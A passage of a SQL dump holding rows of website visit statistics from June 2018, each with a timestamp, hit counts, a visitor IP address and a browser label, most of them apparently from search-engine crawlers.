528338319,1,1,0,0,'66.249.66.76','chrome'),(255859,1528338322,1,0,1,0,'66.249.66.75',''),(255860,1528338457,1,1,0,0,'141.8.142.74','other'),(255861,1528338468,1,1,0,0,'54.36.148.159','other'),(255862,1528338528,1,1,0,0,'54.36.148.70','other'),(255863,1528338678,1,1,0,0,'178.154.171.88','other'),(255864,1528338701,1,1,0,0,'54.36.148.126','other'),(255865,1528338731,1,1,0,0,'54.36.148.83','other'),(255866,1528338844,30,30,0,0,'163.172.255.139','chrome'),(255867,1528339065,1,1,0,0,'216.244.66.241','other'),(255868,1528339076,1,1,0,0,'54.36.149.2','other'),(255869,1528339209,1,1,0,0,'54.36.149.14','other'),(255870,1528339438,1,1,0,0,'54.36.148.84','other'),(255871,1528339465,1,1,0,0,'54.36.148.45','other'),(255872,1528339595,1,1,0,0,'207.46.13.135','other'),(255873,1528339756,1,1,0,0,'54.36.148.173','other'),(255874,1528340062,1,1,0,0,'8.29.198.26','other'),(255875,1528340077,1,1,0,0,'54.36.148.218','other'),(255876,1528340141,1,1,0,0,'180.76.15.149','other'),(255877,1528340148,1,1,0,0,'54.36.148.238','other'),(255878,1528340216,2,2,0,0,'141.8.142.74','other'),(255879,1528340244,1,1,0,0,'66.249.66.155','chrome'),(255880,1528340252,2,2,0,0,'54.36.148.28','other'),(255881,1528340301,1,1,0,0,'54.36.148.133','other'),(255882,1528340398,1,1,0,0,'216.244.66.241','other'),(255883,1528340410,1,1,0,0,'54.36.149.65','other'),(255884,1528340580,1,1,0,0,'54.36.149.19','other'),(255885,1528340795,1,0,1,0,'66.249.66.156',''),(255886,1528341057,1,1,0,0,'54.36.149.13','other'),(255887,1528341099,1,1,0,0,'95.163.255.92','other'),(255888,1528341217,1,1,0,0,'54.36.149.94','other'),(255889,1528341290,1,1,0,0,'54.36.148.94','other'),(255890,1528341480,1,1,0,0,'54.36.148.136','other'),(255891,1528341541,1,1,0,0,'54.36.149.52','other'),(255892,1528341712,1,1,0,0,'54.36.148.190','other'),(255893,1528341780,1,1,0,0,'216.244.66.241','other'),(255894,1528341907,1,0,1,0,'66.249.66.155',''),(255895,1528341967,1,1,0,0,'54.36.148.158','other'),(255896,1528342027,1,1,0,0,'141.8.142.74','other'),(255897,1528342057,1,1,0,0,'54.36.148.51','other'),(255898,1528342526,1,1,0,0,'54.36.148.109','other'),(255899,1528342631,1,1,0,0,'54.36.148.168','other'),(255900,1528342808,1,1,0,0,'54.36.148.61','other'),(255901,1528343042,1,1,0,0,'54.36.148.170','other'),(255902,1528343094,1,1,0,0,'54.36.149.79','other'),(255903,1528343113,1,0,1,0,'66.249.66.76',''),(255904,1528343452,1,1,0,0,'91.196.178.47','chrome'),(255905,1528343474,1,1,0,0,'54.36.148.44','other'),(255906,1528343912,1,1,0,0,'54.36.149.13','other'),(255907,1528344224,1,1,0,0,'216.244.66.241','other'),(255908,1528344299,1,1,0,0,'54.36.148.33','other'),(255909,1528344324,1,0,1,0,'66.249.66.156',''),(255910,1528344381,1,1,0,0,'54.36.148.49','other'),(255911,1528344705,1,1,0,0,'54.36.149.21','other'),(255912,1528344773,1,1,0,0,'54.36.148.223','other'),(255913,1528344926,1,1,0,0,'54.36.148.131','other'),(255914,1528345115,1,1,0,0,'54.36.148.143','other'),(255915,1528345127,1,1,0,0,'54.36.149.4','other'),(255916,1528345307,1,1,0,0,'54.36.148.98','other'),(255917,1528345522,1,1,0,0,'54.36.148.121','other'),(255918,1528345647,1,1,0,0,'54.36.149.32','other'),(255919,1528345661,1,1,0,0,'216.244.66.241','other'),(255920,1528345729,1,1,0,0,'8.29.198.27','other'),(255921,1528345819,1,1,0,0,'54.36.148.84','other'),(255922,1528345915,1,1,0,0,'54.36.148.198','other'),(255923,1528345937,1,1,0,0,'54.36.149.37','other'),(255924,1528346077,1,1,0,0,'54.36.149.56','other'),(255925,1528346085,1,1,0,0,'66.249.66.75','chrome'),(255926,1528346112,1,1,0,0,'141.8.142.74','other'),(255927,1528346536,1,1,0,0,'54.36.149.42','other'),(255928,1528346639,2,2,0,0,'216.244.66.241','other'),(255929,1528346750,1,1,0,0,'54.36.148.154','other'),(255930,1528347111,1,1,0,0,'54.36.148.17','other'),(255931,1528347258,1,0,1,0,'66.249.66.74',''),(255932,1528347448,1,1,0,0,'54.36.149.33','other'),(255933,1528347483,1,1,0,0,'54.36.148.13','other'),(255934,1528347499,1,1,0,0,'54.36.148.101','other'),(255935,1528347558,1,1,0,0,'54.36.148.66','other'),(255936,1528347807,1,1,0,0,'54.36.148.31','other'),(255937,1528348178,1,1,0,0,'54.36.148.145','other'),(255938,1528348306,1,1,0,0,'54.36.149.20','other'),(255939,1528348399,1,1,0,0,'54.36.148.188','other'),(255940,1528348678,1,1,0,0,'54.36.149.63','other'),(255941,1528348679,1,1,0,0,'95.163.255.98','other'),(255942,1528348777,1,1,0,0,'54.36.148.54','other'),(255943,1528348801,1,1,0,0,'54.36.148.196','other'),(255944,1528348907,1,1,0,0,'54.36.148.221','other'),(255945,1528349096,1,1,0,0,'54.36.148.87','other'),(255946,1528349126,1,1,0,0,'54.36.148.179','other'),(255947,1528349137,1,1,0,0,'193.106.30.99','firefox'),(255948,1528349147,1,1,0,0,'108.59.8.80','other'),(255949,1528349157,1,1,0,0,'54.36.148.231','other'),(255950,1528349187,1,1,0,0,'66.249.66.156','chrome'),(255951,1528349278,1,1,0,0,'54.36.148.186','other'),(255952,1528349282,1,1,0,0,'54.36.149.96','other'),(255953,1528349624,2,2,0,0,'91.196.178.85','chrome'),(255954,1528349712,1,1,0,0,'216.244.66.241','other'),(255955,1528349759,1,1,0,0,'54.36.148.60','other'),(255956,1528349926,1,1,0,0,'178.92.24.122','chrome'),(255957,1528350046,2,0,2,0,'66.249.66.157',''),(255958,1528350132,1,1,0,0,'54.36.148.236','other'),(255959,1528350342,1,1,0,0,'178.154.171.88','other'),(255960,1528350438,1,1,0,0,'54.36.149.75','other'),(255961,1528350711,1,1,0,0,'54.36.149.21','other'),(255962,1528350721,1,1,0,0,'109.173.58.50','chrome'),(255963,1528350849,1,1,0,0,'54.36.149.33','other'),(255964,1528350900,1,1,0,0,'8.29.198.25','other'),(255965,1528351101,1,1,0,0,'54.36.148.225','other'),(255966,1528351173,1,1,0,0,'54.36.148.180','other'),(255967,1528351280,1,1,0,0,'141.8.142.74','other'),(255968,1528351295,1,1,0,0,'54.36.148.246','other'),(255969,1528351339,1,1,0,0,'54.36.148.174','other'),(255970,1528351454,1,1,0,0,'54.36.149.20','other'),(255971,1528351469,1,1,0,0,'54.36.148.46','other'),(255972,1528351886,1,1,0,0,'54.36.148.190','other'),(255973,1528351943,1,1,0,0,'91.196.177.15','chrome'),(255974,1528352012,1,1,0,0,'157.55.39.243','other'),(255975,1528352102,1,1,0,0,'66.249.66.75','chrome'),(255976,1528352121,1,1,0,0,'54.36.149.75','other'),(255977,1528352122,1,1,0,0,'54.36.148.202','other'),(255978,1528352159,1,1,0,0,'95.163.255.15','other'),(255979,1528352204,1,1,0,0,'54.36.148.212','other'),(255980,1528352309,1,1,0,0,'95.134.97.103','chrome'),(255981,1528352313,1,1,0,0,'54.36.148.160','other'),(255982,1528352811,1,1,0,0,'54.36.148.241','other'),(255983,1528352876,1,1,0,0,'54.36.148.109','other'),(255984,1528352964,1,1,0,0,'54.36.148.33','other'),(255985,1528352987,1,1,0,0,'54.36.149.52','other'),(255986,1528353156,1,1,0,0,'54.36.148.240','other'),(255987,1528353309,4,4,0,0,'91.196.178.104','chrome'),(255988,1528353329,1,1,0,0,'54.36.148.95','other'),(255989,1528353409,3,3,0,0,'216.244.66.241','other'),(255990,1528353472,1,1,0,0,'54.36.148.143','other'),(255991,1528353660,1,1,0,0,'54.36.148.61','other'),(255992,1528353979,1,1,0,0,'54.36.148.179','other'),(255993,1528354017,1,1,0,0,'54.36.148.50','other'),(255994,1528354030,1,1,0,0,'54.36.148.169','other'),(255995,1528354180,1,1,0,0,'91.124.182.170','firefox'),(255996,1528354327,2,2,0,0,'54.36.148.186','other'),(255997,1528354413,1,1,0,0,'54.36.149.96','other'),(255998,1528354565,1,1,0,0,'54.36.148.248','other'),(255999,1528354719,1,1,0,0,'54.36.148.205','other'),(256000,1528355532,1,1,0,0,'91.196.178.132','firefox'),(256001,1528356569,1,1,0,0,'8.29.198.25','other'),(256002,1528356970,1,1,0,0,'178.154.171.88','other'),(256003,1528357248,1,1,0,0,'141.8.142.74','other'),(256004,1528357417,1,1,0,0,'46.164.130.92','firefox'),(256005,1528358377,1,1,0,0,'54.36.148.25','other'),(256006,1528358507,1,1,0,0,'54.36.149.4','other'),(256007,1528358560,1,1,0,0,'54.36.148.90','other'),(256008,1528358661,1,1,0,0,'54.36.149.29','other'),(256009,1528358982,1,1,0,0,'54.36.148.119','other'),(256010,1528359347,1,1,0,0,'54.36.148.224','other'),(256011,1528359537,1,1,0,0,'178.54.192.194','chrome'),(256012,1528359585,2,0,2,0,'66.249.66.76',''),(256013,1528359597,1,1,0,0,'54.36.149.98','other'),(256014,1528360244,1,1,0,0,'54.36.149.20','other'),(256015,1528360326,1,1,0,0,'54.36.149.9','other'),(256016,1528360424,1,1,0,0,'54.36.149.12','other'),(256017,1528360473,1,1,0,0,'54.36.149.22','other'),(256018,1528360697,1,1,0,0,'54.36.149.16','other'),(256019,1528360958,1,1,0,0,'54.36.148.135','other'),(256020,1528361139,1,1,0,0,'91.196.178.73','chrome'),(256021,1528361457,1,1,0,0,'216.244.66.241','other'),(256022,1528361482,1,1,0,0,'54.36.149.7','other'),(256023,1528361603,1,1,0,0,'91.196.178.181','chrome'),(256024,1528361737,1,1,0,0,'8.29.198.27','other'),(256025,1528361918,1,1,0,0,'95.179.130.8','chrome'),(256026,1528361919,1,1,0,0,'95.179.130.8','firefox'),(256027,1528362012,1,1,0,0,'54.36.148.206','other'),(256028,1528362115,1,1,0,0,'54.36.148.30','other'),(256029,1528362191,1,1,0,0,'54.36.149.30','other'),(256030,1528362256,1,1,0,0,'54.36.148.69','other'),(256031,1528362374,1,1,0,0,'54.36.149.73','other'),(256032,1528362539,1,1,0,0,'54.36.149.41','other'),(256033,1528362765,1,1,0,0,'54.36.149.34','other'),(256034,1528362839,1,1,0,0,'54.36.149.42','other'),(256035,1528362912,1,1,0,0,'62.205.134.182','other'),(256036,1528363014,1,1,0,0,'54.36.148.169','other'),(256037,1528363062,1,1,0,0,'54.36.148.178','other'),(256038,1528363119,1,1,0,0,'54.36.148.51','other'),(256039,1528363270,1,1,0,0,'54.36.148.53','other'),(256040,1528363314,1,1,0,0,'54.36.148.242','other'),(256041,1528363400,1,1,0,0,'54.36.149.70','other'),(256042,1528363401,1,1,0,0,'54.36.148.211','other'),(256043,1528363422,1,1,0,0,'54.36.148.122','other'),(256044,1528363520,1,1,0,0,'54.36.148.160','other'),(256045,1528363710,1,0,1,0,'66.249.66.157',''),(256046,1528363934,1,1,0,0,'54.36.148.105','other'),(256047,1528363942,1,1,0,0,'54.36.148.225','other'),(256048,1528364072,2,2,0,0,'193.19.152.14','chrome'),(256049,1528364277,1,1,0,0,'54.36.148.82','other'),(256050,1528364542,1,1,0,0,'54.36.148.136','other'),(256051,1528364750,1,1,0,0,'54.36.148.214','other'),(256052,1528364960,1,1,0,0,'54.36.148.31','other'),(256053,1528365074,1,1,0,0,'95.163.255.113','other'),(256054,1528365079,1,1,0,0,'54.36.148.46','other'),(256055,1528365087,1,1,0,0,'95.163.255.117','other'),(256056,1528365089,1,1,0,0,'54.36.148.113','other'),(256057,1528365451,1,1,0,0,'54.36.148.110','other'),(256058,1528365500,1,1,0,0,'54.36.148.173','other'),(256059,1528365501,1,1,0,0,'54.36.148.153','other'),(256060,1528365749,1,1,0,0,'54.36.148.128','other'),(256061,1528365752,1,1,0,0,'37.9.113.115','other'),(256062,1528365761,1,1,0,0,'54.36.148.58','other'),(256063,1528365777,1,0,1,0,'66.249.66.157',''),(256064,1528365842,1,1,0,0,'54.36.148.14','other'),(256065,1528366194,1,1,0,0,'54.36.149.69','other'),(256066,1528366303,1,1,0,0,'216.244.66.241','other'),(256067,1528366310,1,1,0,0,'54.36.148.230','other'),(256068,1528366511,1,1,0,0,'62.205.134.182','other'),(256069,1528367042,1,1,0,0,'54.36.148.111','other'),(256070,1528367099,1,1,0,0,'95.215.219.161','chrome'),(256071,1528367375,1,1,0,0,'216.244.66.241','other'),(256072,1528367408,1,1,0,0,'8.29.198.27','other'),(256073,1528367781,1,1,0,0,'54.36.148.220','other'),(256074,1528367810,1,1,0,0,'54.36.149.65','other'),(256075,1528367860,1,1,0,0,'54.36.148.243','other'),(256076,1528367935,1,1,0,0,'54.36.149.25','other'),(256077,1528368082,1,0,1,0,'66.249.66.75',''),(256078,1528368201,2,2,0,0,'54.36.149.9','other'),(256079,1528368331,1,1,0,0,'54.36.148.88','other'),(256080,1528368395,1,0,1,0,'66.249.66.157',''),(256081,1528368691,1,1,0,0,'54.36.148.234','other'),(256082,1528368905,1,1,0,0,'178.94.82.246','chrome'),(256083,1528368964,1,1,0,0,'54.36.148.71','other'),(256084,1528369445,1,1,0,0,'54.36.148.196','other'),(256085,1528369637,1,1,0,0,'54.36.148.149','other'),(256086,1528369697,1,1,0,0,'54.36.148.59','other'),(256087,1528369847,1,1,0,0,'141.8.142.74','other'),(256088,1528369938,2,2,0,0,'216.244.66.241','other'),(256089,1528369956,1,1,0,0,'54.36.148.234','other'),(256090,1528369999,2,0,2,0,'66.249.66.155',''),(256091,1528370066,1,1,0,0,'54.36.148.33','other'),(256092,1528370111,1,1,0,0,'62.205.134.182','other'),(256093,1528370391,1,1,0,0,'54.36.149.61','other'),(256094,1528370596,1,1,0,0,'54.36.148.27','other'),(256095,1528370697,1,1,0,0,'54.36.149.87','other'),(256096,1528370788,2,2,0,0,'54.36.148.132','other'),(256097,1528370837,1,1,0,0,'37.9.113.115','other'),(256098,1528371188,1,1,0,0,'176.37.33.161','other'),(256099,1528371315,1,1,0,0,'54.36.148.191','other'),(256100,1528371406,1,1,0,0,'54.36.148.38','other'),(256101,1528371624,1,1,0,0,'66.249.66.74','chrome'),(256102,1528371775,1,1,0,0,'54.36.148.175','other'),(256103,1528371777,1,1,0,0,'54.36.148.131','other'),(256104,1528371917,1,1,0,0,'54.36.148.25','other'),(256105,1528372498,1,1,0,0,'54.36.148.247','other'),(256106,1528372504,1,1,0,0,'54.36.148.87','other'),(256107,1528372567,1,1,0,0,'8.29.198.27','other'),(256108,1528372610,1,1,0,0,'54.36.148.237','other'),(256109,1528372681,1,1,0,0,'216.244.66.241','other'),(256110,1528372925,1,1,0,0,'46.200.136.210','chrome'),(256111,1528373079,1,1,0,0,'54.36.149.3','other'),(256112,1528373124,1,1,0,0,'54.36.149.66','other'),(256113,1528373188,1,1,0,0,'54.36.148.206','other'),(256114,1528373266,3,3,0,0,'91.196.178.85','chrome'),(256115,1528373291,1,1,0,0,'54.36.148.119','other'),(256116,1528373317,1,1,0,0,'54.36.149.35','other'),(256117,1528373710,1,1,0,0,'62.205.134.182','other'),(256118,1528373777,1,1,0,0,'216.244.66.241','other'),(256119,1528374156,1,1,0,0,'54.36.148.200','other'),(256120,1528374175,1,1,0,0,'54.36.148.220','other'),(256121,1528374193,1,1,0,0,'194.187.216.82','chrome'),(256122,1528374335,1,0,1,0,'66.249.66.156',''),(256123,1528374398,1,1,0,0,'54.36.148.83','other'),(256124,1528374439,1,1,0,0,'54.36.149.26','other'),(256125,1528374557,1,1,0,0,'54.36.148.38','other'),(256126,1528374593,1,1,0,0,'54.36.148.114','other'),(256127,1528374666,1,1,0,0,'54.36.148.189','other'),(256128,1528374794,1,1,0,0,'54.36.149.23','other'),(256129,1528374828,2,2,0,0,'78.111.190.230','chrome'),(256130,1528374877,1,1,0,0,'178.154.200.41','other'),(256131,1528374988,1,1,0,0,'54.36.148.21','other'),(256132,1528375024,1,1,0,0,'54.36.148.56','other'),(256133,1528375150,1,1,0,0,'54.36.148.243','other'),(256134,1528375385,1,1,0,0,'54.36.148.31','other'),(256135,1528375436,1,1,0,0,'54.36.148.64','other'),(256136,1528375500,1,1,0,0,'91.196.178.130','chrome'),(256137,1528375649,1,1,0,0,'54.36.148.75','other'),(256138,1528376028,1,1,0,0,'54.36.148.103','other'),(256139,1528376395,1,1,0,0,'54.36.148.230','other'),(256140,1528376448,1,1,0,0,'95.132.2.219','chrome'),(256141,1528376595,1,1,0,0,'54.36.149.61','other'),(256142,1528376841,2,2,0,0,'216.244.66.241','other'),(256143,1528376934,1,1,0,0,'54.36.149.40','other'),(256144,1528377086,2,2,0,0,'46.185.73.63','chrome'),(256145,1528377310,1,1,0,0,'62.205.134.182','other'),(256146,1528377344,1,1,0,0,'54.36.149.47','other'),(256147,1528377380,1,1,0,0,'54.36.148.88','other'),(256148,1528377585,1,0,1,0,'66.249.66.155',''),(256149,1528377598,1,1,0,0,'54.36.149.49','other'),(256150,1528377654,2,2,0,0,'91.196.178.70','chrome'),(256151,1528377671,1,1,0,0,'213.180.203.8','other'),(256152,1528377758,1,1,0,0,'54.36.149.43','other'),(256153,1528377960,1,1,0,0,'54.36.148.247','other'),(256154,1528378036,1,1,0,0,'54.36.149.65','other'),(256155,1528378041,1,1,0,0,'54.36.148.142','other'),(256156,1528378252,1,1,0,0,'8.29.198.27','other'),(256157,1528378289,1,1,0,0,'54.36.148.189','other'),(256158,1528378442,1,1,0,0,'91.196.178.102','chrome'),(256159,1528378646,1,1,0,0,'54.36.148.96','other'),(256160,1528378704,1,1,0,0,'87.250.224.66','other'),(256161,1528378833,1,1,0,0,'54.36.148.62','other'),(256162,1528379463,1,1,0,0,'54.36.148.138','other'),(256163,1528379817,1,1,0,0,'91.196.178.98','chrome'),(256164,1528379955,1,1,0,0,'54.36.149.71','other'),(256165,1528380118,2,2,0,0,'176.37.33.161','chrome'),(256166,1528380197,1,1,0,0,'54.36.148.148','other'),(256167,1528380215,1,1,0,0,'54.36.149.6','other'),(256168,1528380244,2,2,0,0,'54.36.148.33','other'),(256169,1528380395,1,1,0,0,'54.36.148.178','other'),(256170,1528380639,1,1,0,0,'216.244.66.241','other'),(256171,1528380851,1,1,0,0,'54.36.148.77','other'),(256172,1528380855,1,1,0,0,'54.36.148.23','other'),(256173,1528380876,2,2,0,0,'54.36.148.184','other'),(256174,1528381001,1,1,0,0,'54.36.148.131','other'),(256175,1528381108,1,1,0,0,'212.111.196.202','firefox'),(256176,1528381796,1,1,0,0,'54.36.148.195','other'),(256177,1528381888,1,1,0,0,'54.36.148.158','other'),(256178,1528382055,1,1,0,0,'54.36.148.131','other'),(256179,1528382216,1,1,0,0,'54.36.148.221','other'),(256180,1528382599,1,1,0,0,'54.36.148.204','other'),(256181,1528382702,1,1,0,0,'54.36.148.150','other'),(256182,1528382734,1,1,0,0,'54.36.149.18','other'),(256183,1528382750,1,1,0,0,'54.36.148.238','other'),(256184,1528382755,1,1,0,0,'54.36.148.83','other'),(256185,1528382888,1,1,0,0,'54.36.148.198','other'),(256186,1528382959,1,0,1,0,'66.249.66.157',''),(256187,1528383145,1,1,0,0,'54.36.148.73','other'),(256188,1528383285,1,1,0,0,'54.36.148.125','other'),(256189,1528383399,1,1,0,0,'8.29.198.26','other'),(256190,1528383590,1,1,0,0,'54.36.148.202','other'),(256191,1528383905,1,1,0,0,'54.36.149.65','other'),(256192,1528383934,1,1,0,0,'54.36.149.21','other'),(256193,1528384192,1,1,0,0,'54.36.148.28','other'),(256194,1528384243,1,1,0,0,'178.154.171.10','other'),(256195,1528384401,1,1,0,0,'188.230.43.254','other'),(256196,1528384412,1,1,0,0,'54.36.148.165','other'),(256197,1528384763,1,1,0,0,'54.36.148.101','other'),(256198,1528385149,1,1,0,0,'54.36.149.15','other'),(256199,1528385156,1,1,0,0,'54.36.148.220','other'),(256200,1528385360,1,1,0,0,'54.36.148.139','other'),(256201,1528385493,1,0,1,0,'66.249.66.155',''),(256202,1528385566,1,1,0,0,'54.36.148.203','other'),(256203,1528385618,1,1,0,0,'54.36.148.214','other'),(256204,1528386413,1,0,1,0,'66.249.66.155',''),(256205,1528386520,1,1,0,0,'54.36.148.247','other'),(256206,1528386722,1,1,0,0,'54.36.148.168','other'),(256207,1528386799,1,1,0,0,'188.230.43.254','other'),(256208,1528387007,1,1,0,0,'54.36.149.33','other'),(256209,1528387269,1,1,0,0,'54.36.148.214','other'),(256210,1528387369,1,1,0,0,'37.9.113.132','other'),(256211,1528387373,1,1,0,0,'54.36.149.28','other'),(256212,1528387472,1,1,0,0,'54.36.148.237','other'),(256213,1528387494,1,1,0,0,'54.36.148.112','other'),(256214,1528387565,1,1,0,0,'54.36.148.106','other'),(256215,1528387595,1,1,0,0,'54.36.149.68','other'),(256216,1528387900,1,1,0,0,'54.36.148.76','other'),(256217,1528388180,1,1,0,0,'54.36.149.16','other'),(256218,1528388328,1,1,0,0,'54.36.148.77','other'),(256219,1528388665,1,1,0,0,'54.36.148.152','other'),(256220,1528388681,1,1,0,0,'54.36.149.102','other'),(256221,1528388847,1,1,0,0,'85.21.233.180','other'),(256222,1528388891,1,1,0,0,'54.36.148.182','other'),(256223,1528389090,1,1,0,0,'8.29.198.26','other'),(256224,1528389137,1,1,0,0,'54.36.148.220','other'),(256225,1528389146,1,1,0,0,'213.180.203.8','other'),(256226,1528389150,1,1,0,0,'37.9.113.157','other'),(256227,1528389202,1,1,0,0,'188.230.43.254','other'),(256228,1528389256,1,1,0,0,'91.196.178.94','firefox'),(256229,1528389316,1,1,0,0,'54.36.148.219','other'),(256230,1528389397,1,1,0,0,'54.36.148.239','other'),(256231,1528389558,1,1,0,0,'54.36.149.47','other'),(256232,1528389569,1,1,0,0,'54.36.149.79','other'),(256233,1528389678,1,1,0,0,'54.36.149.11','other'),(256234,1528389760,1,1,0,0,'54.36.148.152','other'),(256235,1528390055,1,1,0,0,'54.36.148.217','other'),(256236,1528390153,1,1,0,0,'54.36.148.43','other'),(256237,1528390435,1,1,0,0,'54.36.149.100','other'),(256238,1528390440,1,1,0,0,'54.36.148.235','other'),(256239,1528390461,1,0,1,0,'66.249.66.156',''),(256240,1528390591,1,1,0,0,'54.36.149.66','other'),(256241,1528390768,1,1,0,0,'54.36.148.205','other'),(256242,1528391034,1,1,0,0,'54.36.148.119','other'),(256243,1528391186,1,1,0,0,'157.55.39.243','other'),(256244,1528391597,1,1,0,0,'188.230.43.254','other'),(256245,1528391618,2,2,0,0,'91.196.178.186','chrome'),(256246,1528391759,1,0,1,0,'66.249.66.156',''),(256247,1528391841,1,1,0,0,'54.36.148.195','other'),(256248,1528392007,1,1,0,0,'54.36.148.77','other'),(256249,1528392191,1,1,0,0,'54.36.149.37','other'),(256250,1528392221,1,1,0,0,'54.36.149.98','other'),(256251,1528392443,1,1,0,0,'54.36.149.60','other'),(256252,1528392468,1,1,0,0,'91.196.178.69','chrome'),(256253,1528393069,1,1,0,0,'157.55.39.246','other'),(256254,1528393189,1,1,0,0,'54.36.149.1','other'),(256255,1528393212,1,1,0,0,'54.36.148.24','other'),(256256,1528393493,1,1,0,0,'141.8.132.19','other'),(256257,1528393859,1,1,0,0,'54.36.149.63','other'),(256258,1528394234,1,1,0,0,'54.36.148.162','other'),(256259,1528394253,1,1,0,0,'8.29.198.26','other'),(256260,1528394274,1,1,0,0,'54.36.148.123','other'),(256261,1528394509,1,1,0,0,'54.36.148.197','other'),(256262,1528394540,1,1,0,0,'54.36.148.111','other'),(256263,1528394571,1,1,0,0,'54.36.148.112','other'),(256264,1528394797,1,1,0,0,'54.36.148.173','other'),(256265,1528394963,1,1,0,0,'54.36.148.183','other'),(256266,1528395048,1,1,0,0,'5.45.207.82','other'),(256267,1528395059,1,1,0,0,'54.36.148.68','other'),(256268,1528395068,1,0,1,0,'66.249.66.74',''),(256269,1528395142,1,0,1,0,'66.249.66.156',''),(256270,1528395393,1,1,0,0,'54.36.149.47','other'),(256271,1528395677,1,1,0,0,'54.36.148.226','other'),(256272,1528395697,1,1,0,0,'180.76.15.25','other'),(256273,1528395993,1,1,0,0,'80.252.155.198','chrome'),(256274,1528395994,1,1,0,0,'54.36.148.141','other'),(256275,1528396026,1,1,0,0,'54.36.148.224','other'),(256276,1528396132,1,1,0,0,'54.36.149.20','other'),(256277,1528396559,1,1,0,0,'54.36.148.112','other'),(256278,1528396684,1,1,0,0,'54.36.148.248','other'),(256279,1528396732,1,1,0,0,'54.36.148.238','other'),(256280,1528396852,1,1,0,0,'54.36.148.186','other'),(256281,1528396999,1,1,0,0,'54.36.148.217','other'),(256282,1528397078,1,1,0,0,'54.36.148.73','other'),(256283,1528397107,1,1,0,0,'54.36.149.28','other'),(256284,1528397158,1,1,0,0,'54.36.148.213','other'),(256285,1528397379,1,1,0,0,'54.36.149.98','other'),(256286,1528397770,1,1,0,0,'54.36.148.85','other'),(256287,1528397927,1,1,0,0,'54.36.148.112','other'),(256288,1528398055,1,1,0,0,'54.36.148.244','other'),(256289,1528398233,1,1,0,0,'54.36.149.71','other'),(256290,1528398274,1,1,0,0,'54.36.148.233','other'),(256291,1528398347,1,1,0,0,'54.83.137.40','other'),(256292,1528398634,1,1,0,0,'54.36.148.225','other'),(256293,1528399015,1,1,0,0,'54.36.148.154','other'),(256294,1528399518,1,1,0,0,'54.36.148.71','other'),(256295,1528399646,1,1,0,0,'37.9.113.115','other'),(256296,1528399740,1,1,0,0,'54.36.149.92','other'),(256297,1528399791,1,1,0,0,'178.162.206.41','msie'),(256298,1528399795,10,10,0,0,'178.162.206.41','opera'),(256299,1528399902,1,1,0,0,'54.36.149.36','other'),(256300,1528399926,1,1,0,0,'8.29.198.25','other'),(256301,1528400295,2,2,0,0,'91.196.178.178','chrome'),(256302,1528400372,1,1,0,0,'54.36.148.46','other'),(256303,1528400845,1,1,0,0,'180.76.15.155','other'),(256304,1528401071,1,1,0,0,'54.36.148.100','other'),(256305,1528401125,1,1,0,0,'54.36.148.194','other'),(256306,1528401209,1,1,0,0,'54.36.148.162','other'),(256307,1528401662,1,1,0,0,'54.36.148.197','other'),(256308,1528402155,1,1,0,0,'54.36.148.237','other'),(256309,1528402231,1,1,0,0,'54.36.149.10','other'),(256310,1528402297,1,1,0,0,'54.36.148.39','other'),(256311,1528402301,1,1,0,0,'54.36.148.145','other'),(256312,1528402333,1,1,0,0,'213.180.203.40','other'),(256313,1528402372,1,1,0,0,'178.92.58.158','chrome'),(256314,1528402574,1,1,0,0,'54.36.149.97','other'),(256315,1528402741,1,1,0,0,'54.36.149.60','other'),(256316,1528402756,1,0,1,0,'66.249.66.156',''),(256317,1528402845,2,2,0,0,'54.36.148.36','other'),(256318,1528403121,1,1,0,0,'54.36.149.32','other'),(256319,1528403571,1,1,0,0,'54.36.148.209','other'),(256320,1528404204,1,1,0,0,'54.36.149.55','other'),(256321,1528404342,1,1,0,0,'54.36.148.113','other'),(256322,1528404469,1,1,0,0,'54.36.149.98','other'),(256323,1528405059,1,1,0,0,'54.36.148.22','other'),(256324,1528405099,1,1,0,0,'8.29.198.26','other'),(256325,1528405344,1,1,0,0,'54.36.148.10','other'),(256326,1528405346,1,1,0,0,'54.36.148.220','other'),(256327,1528405428,1,1,0,0,'54.36.148.246','other'),(256328,1528405538,1,1,0,0,'54.36.149.51','other'),(256329,1528405587,1,1,0,0,'54.36.149.91','other'),(256330,1528405664,1,1,0,0,'54.36.149.36','other'),(256331,1528406047,1,1,0,0,'54.36.148.171','other'),(256332,1528406129,1,1,0,0,'141.8.142.74','other'),(256333,1528406197,1,1,0,0,'54.36.148.178','other'),(256334,1528406204,1,1,0,0,'157.55.39.243','other'),(256335,1528406281,1,1,0,0,'54.36.148.137','other'),(256336,1528406490,1,1,0,0,'54.36.149.53','other'),(256337,1528406548,1,1,0,0,'54.36.149.73','other'),(256338,1528406705,1,1,0,0,'54.36.148.200','other'),(256339,1528406719,1,1,0,0,'54.36.148.68','other'),(256340,1528407044,1,1,0,0,'54.36.148.233','other'),(256341,1528407175,1,1,0,0,'54.36.148.206','other'),(256342,1528407179,1,1,0,0,'54.36.148.52','other'),(256343,1528407430,1,1,0,0,'54.36.149.102','other'),(256344,1528407682,1,1,0,0,'54.36.148.194','other'),(256345,1528408169,1,1,0,0,'54.36.148.126','other'),(256346,1528408222,1,1,0,0,'54.36.148.124','other'),(256347,1528408321,2,2,0,0,'141.8.142.74','other'),(256348,1528408374,1,1,0,0,'54.36.148.75','other'),(256349,1528408551,1,1,0,0,'54.36.148.183','other'),(256350,1528408723,1,1,0,0,'54.36.149.47','other'),(256351,1528408919,1,1,0,0,'54.36.149.86','other'),(256352,1528409322,1,1,0,0,'54.36.148.243','other'),(256353,1528409526,1,0,1,0,'66.249.66.155',''),(256354,1528409564,1,1,0,0,'54.36.148.78','other'),(256355,1528409731,1,1,0,0,'54.36.148.153','other'),(256356,1528409779,1,1,0,0,'54.36.149.10','other'),(256357,1528409847,1,1,0,0,'5.45.207.58','other'),(256358,1528409880,1,1,0,0,'54.36.148.232','other'),(256359,1528410172,1,1,0,0,'54.36.149.2','other'),(256360,1528410402,1,1,0,0,'54.36.148.126','other'),(256361,1528410568,1,1,0,0,'54.36.148.20','other'),(256362,1528410607,1,1,0,0,'54.36.149.41','other'),(256363,1528410622,1,1,0,0,'54.36.148.140','other'),(256364,1528410693,1,0,1,0,'66.249.66.156',''),(256365,1528410745,1,1,0,0,'54.36.148.33','other'),(256366,1528410753,1,1,0,0,'8.29.198.25','other'),(256367,1528410942,1,1,0,0,'54.36.149.6','other'),(256368,1528411008,1,1,0,0,'54.36.148.200','other'),(256369,1528411055,1,1,0,0,'37.9.113.100','other'),(256370,1528411232,1,0,1,0,'66.249.66.75',''),(256371,1528411383,1,1,0,0,'54.36.149.92','other'),(256372,1528411405,1,1,0,0,'54.36.148.196','other'),(256373,1528